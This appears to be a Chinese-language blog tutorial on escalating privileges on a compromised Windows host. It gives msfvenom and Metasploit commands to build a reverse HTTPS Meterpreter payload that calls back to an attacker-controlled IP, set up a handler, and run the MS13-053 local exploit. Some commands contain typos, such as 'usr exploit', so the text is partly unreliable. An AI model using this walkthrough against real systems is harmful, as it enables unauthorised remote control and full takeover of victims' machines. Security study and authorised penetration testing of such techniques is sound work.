提权——Windows 本地漏洞提权

当我们获得webshell 想要进行创建用户等操作的时候会发现自己的权限不够,这个时候我们就需要进行提权的操作
提权主要包含这几种方式
1.数据库提权
2.本地溢出漏洞提权
3.第三方软件提权

我们来演示一下 利用MSF来进行本地漏洞的提权操作。
1.通过msf生成反弹shll进行执行反弹shll的操作
进入到kalis使用这条命令 来生成一个反弹shell 的.exe程序。
msfvenom -p windows/meterpreter/reverse_https LHOST=反弹的ip地址 LPORT=反弹的端口号 -f exe > /root/shell01.exe

提权——Windows 本地漏洞提权_第1张图片

2.上传shell01.exe这个程序
提权——Windows 本地漏洞提权_第2张图片

3.运行shell01.exe 开启MSF,配置监听模块
使用MSF监听模块进行监听
usr exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 设置生成反弹shell的IP地址
set lport 设置生成反弹shell的端口号
exploit执行
提权——Windows 本地漏洞提权_第3张图片
4.当获取meterpreter>shell之后 使用background返回到MSF 菜单
搜索可利用的提权漏洞
使用indows-Exploit-Suggester这脚本工具来 搜索可以使用的exp.
提权——Windows 本地漏洞提权_第4张图片
background返回到MSF 菜单搜索可利用的提权漏洞
我们使用MS13-053来进行提权
提权——Windows 本地漏洞提权_第5张图片
/exploit/windows/local/ ----这个用于当地漏洞提权目录的集合

5.当获得到meterpreter shell 之后输入 getuid就可以成功进行提权;

你可能感兴趣的:(提权)